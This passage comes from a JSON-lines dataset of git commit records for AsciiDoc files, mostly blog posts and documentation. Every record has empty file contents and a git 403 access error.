2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4df2ca8427b4020035360437185518d96651ec61","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fa7f126ad1f5e1450bea3582d84e235be4ad2b","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64eac0f40752690cac8d08c4576fcddecfc59b62","subject":"README.asciidoc; Softlink to the real README.","message":"README.asciidoc; Softlink to the real README.\n\n...that's the only way it gets displayed.\n","repos":"ubiqx-org\/Carnaval,manuella\/Carnaval","old_file":"scripts\/README.asciidoc","new_file":"scripts\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ubiqx-org\/Carnaval.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"247b25d01b559d0be5242ddab582e6af2cdb8ea8","subject":"Update 2018-01-20-Bitrise-de-ci.adoc","message":"Update 2018-01-20-Bitrise-de-ci.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d06c13895400560865b3285401c3eb5b885cf3a1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a34d033c523c7c36902b2e0dd5c50d26bcf5f56","subject":"Publish 20161110-1232.adoc","message":"Publish 20161110-1232.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232.adoc","new_file":"20161110-1232.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94e42afc3ed16ed8bd9b77b8b26faa05b102748","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0acd443082aee2e03128446ab4888f1651618174","subject":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","message":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c572bcd57090f4843f86f40cbce322c01e092726","subject":"Update 2017-02-14-A-Lovely-Poem.adoc","message":"Update 2017-02-14-A-Lovely-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-14-A-Lovely-Poem.adoc","new_file":"_posts\/2017-02-14-A-Lovely-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2a3a8ecf0c78555663286a28dc7c65d775b2dba","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee229f15eeff770098a422486916114287442a4","subject":"Update 2017-01-17-Learning-good-image-representation.adoc","message":"Update 2017-01-17-Learning-good-image-representation.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-17-Learning-good-image-representation.adoc","new_file":"_posts\/2017-01-17-Learning-good-image-representation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bac9a97afa041347fe4ae6e359066ab300aee73","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e584412de7191da83addcde90c193c6b7b99dc7d","subject":"Add the manual for cowboy_http2","message":"Add the manual for cowboy_http2\n","repos":"hairyhum\/cowboy,ninenines\/cowboy,bsmr-erlang\/cowboy,rabbitmq\/cowboy,kivra\/cowboy,K2InformaticsGmbH\/cowboy,turtleDeng\/cowboy,CrankWheel\/cowboy","old_file":"doc\/src\/manual\/cowboy_http2.asciidoc","new_file":"doc\/src\/manual\/cowboy_http2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"199a7d360d772b83f6dd4a7b3550a24a0815a69f","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1578d71c54b64e5f257c73eba48e890679fb3aff","subject":"Update 2018-08-23-Lover.adoc","message":"Update 2018-08-23-Lover.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-23-Lover.adoc","new_file":"_posts\/2018-08-23-Lover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"872c736477f982cdc92142364415f7cd7a4bd555","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"27f98bdd3c447f07fcce826ad927221803ad592f","subject":"rework deps guide","message":"rework deps guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/deps_and_cli.adoc","new_file":"content\/guides\/deps_and_cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"62fac5aef8356cba50bb3b5d99384f5f008e2242","subject":"couldn't figure out a better place to put this - just document the yaml settings for the agent","message":"couldn't figure out a better place to put this - just document the yaml settings for the agent\n","repos":"hawkular\/hawkular-agent,hawkular\/hawkular-agent,hawkular\/hawkular-agent","old_file":"hawkular-javaagent\/AGENT-CONFIG.adoc","new_file":"hawkular-javaagent\/AGENT-CONFIG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-agent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a05aa8c9d7dc639df965af5a6ed16ddc358df3b","subject":"Create README.adoc","message":"Create README.adoc","repos":"ktoso\/asciidoctor-sbt-plugin,ktoso\/asciidoctor-sbt-plugin,ktoso\/asciidoctor-sbt-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ktoso\/asciidoctor-sbt-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f101017811f762f6744cb28ccea015a1b366821","subject":"Provide some examples","message":"Provide some examples","repos":"jprante\/elasticsearch-plugin-bundle,jprante\/elasticsearch-plugin-bundle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jprante\/elasticsearch-plugin-bundle.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b1a9b299d1f908a6c5b762cb6e761b69d7934411","subject":"explain navinfo, navinfo1, navinfo2 new attributes","message":"explain navinfo, navinfo1, navinfo2 new attributes\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"docs\/document-structure.asciidoc","new_file":"docs\/document-structure.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50324a35679826dbcc245b5efb5facbba76bb926","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108d531759b0759708e2c1cdc3da24dae56a780e","subject":"new Transaction documentation file","message":"new Transaction documentation file\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/digital_asset_transaction\/asset_redemption\/bitDubai\/version-1\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/digital_asset_transaction\/asset_redemption\/bitDubai\/version-1\/version1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfed5a8ec3d257c59c4badd4bd82855fd528937","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df17f080e65eaa16d0536ec72e66e85a34d9c0a4","subject":"draft for gist","message":"draft for gist\n","repos":"qnib\/neo4j-hackathon2015","old_file":"qinv.adoc","new_file":"qinv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qnib\/neo4j-hackathon2015.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"975de6cedabdb51b590e15750f2455279378993d","subject":"Update 2015-09-19-God-with-you.adoc","message":"Update 2015-09-19-God-with-you.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-19-God-with-you.adoc","new_file":"_posts\/2015-09-19-God-with-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859633799e7867aa053ec67241bb93229568d4cd","subject":"Update 2016-01-31-what-is-PyPy.adoc","message":"Update 2016-01-31-what-is-PyPy.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-31-what-is-PyPy.adoc","new_file":"_posts\/2016-01-31-what-is-PyPy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdce4bae58a8c94cf6a485087c1e3aa49ff831c0","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3211c20a3b47ff441e1a11fe856775afeecb3374","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99a2768b33834461a03c62a839732ed75b9c421c","subject":"upd links","message":"upd links","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c5619a29a789c10e2b436f83a83484d1cda732b","subject":"Fix spelling error","message":"Fix spelling error","repos":"uschindler\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/query-dsl\/query-string-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/query-string-syntax.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gingerwizard\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dadd3635283f92d37a3f6d298dff1b90e9df3075","subject":"Update 2015-07-22-Werther.adoc","message":"Update 2015-07-22-Werther.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Werther.adoc","new_file":"_posts\/2015-07-22-Werther.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a388177f1cb9bbd3c51296b5a09fdfccaf8cf3cc","subject":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","message":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61db0102c0cacf5b1a8fafb603d9cba646f234fd","subject":"Update 2017-12-31-Building-an-AntiCheating-system.adoc","message":"Update 2017-12-31-Building-an-AntiCheating-system.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2017-12-31-Building-an-AntiCheating-system.adoc","new_file":"_posts\/2017-12-31-Building-an-AntiCheating-system.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15c277c89297973285751e9b1e0b415728426d3c","subject":"_posts\/2016-07-13-MH17.adoc","message":"_posts\/2016-07-13-MH17.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-13-MH17.adoc","new_file":"_posts\/2016-07-13-MH17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e5fa5c6299af332276f15fc7dde7463d2d0e637","subject":"Update 2016-02-02-my-title.adoc","message":"Update 2016-02-02-my-title.adoc","repos":"alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io","old_file":"_posts\/2016-02-02-my-title.adoc","new_file":"_posts\/2016-02-02-my-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexbleasdale\/alexbleasdale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c23f53c70deff4e40963166150ee8cf1e481131","subject":"y2b create post 1TB PS3 Hard Drive Upgrade","message":"y2b create post 1TB PS3 Hard Drive Upgrade","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-23-1TB-PS3-Hard-Drive-Upgrade.adoc","new_file":"_posts\/2011-10-23-1TB-PS3-Hard-Drive-Upgrade.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63a6f0c2e7115b6efcf1452d4ec80b382d0741ba","subject":"Debezium 1.1.0.Alpha1 release announcement","message":"Debezium 1.1.0.Alpha1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-01-16-debezium-1-1-alpha1-released.adoc","new_file":"blog\/2020-01-16-debezium-1-1-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e77452d4f7402308b6d5ed9498cc698765a9df07","subject":"Update 2017-06-07-pip-via-cntlm.adoc","message":"Update 2017-06-07-pip-via-cntlm.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-07-pip-via-cntlm.adoc","new_file":"_posts\/2017-06-07-pip-via-cntlm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84b411a51205043aab7ee64e232ade3afae80ecd","subject":"Update 2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","message":"Update 2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","new_file":"_posts\/2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179663867f81cc917050d5a585b01e27890476d7","subject":"y2b create post Protocol Falcon Jet RC Helicopter Unboxing","message":"y2b create post Protocol Falcon Jet RC Helicopter Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-14-Protocol-Falcon-Jet-RC-Helicopter-Unboxing.adoc","new_file":"_posts\/2011-12-14-Protocol-Falcon-Jet-RC-Helicopter-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"804b33bdccffebbd495e2cfcdcafabd542cd557e","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"567add70e29c4a717206ee6c821f7fd018f4f404","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a80d4016a026b7d8b8296f6ef75ed52b159f08b","subject":"Update 2017-06-23-This-is-just-a-test-blog-post.adoc","message":"Update 2017-06-23-This-is-just-a-test-blog-post.adoc","repos":"marioandres\/marioandres.github.io,marioandres\/marioandres.github.io,marioandres\/marioandres.github.io,marioandres\/marioandres.github.io","old_file":"_posts\/2017-06-23-This-is-just-a-test-blog-post.adoc","new_file":"_posts\/2017-06-23-This-is-just-a-test-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marioandres\/marioandres.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"400784e98f14350399b8cb7a0aa6e3f889e136cb","subject":"Update 2015-02-11-.adoc","message":"Update 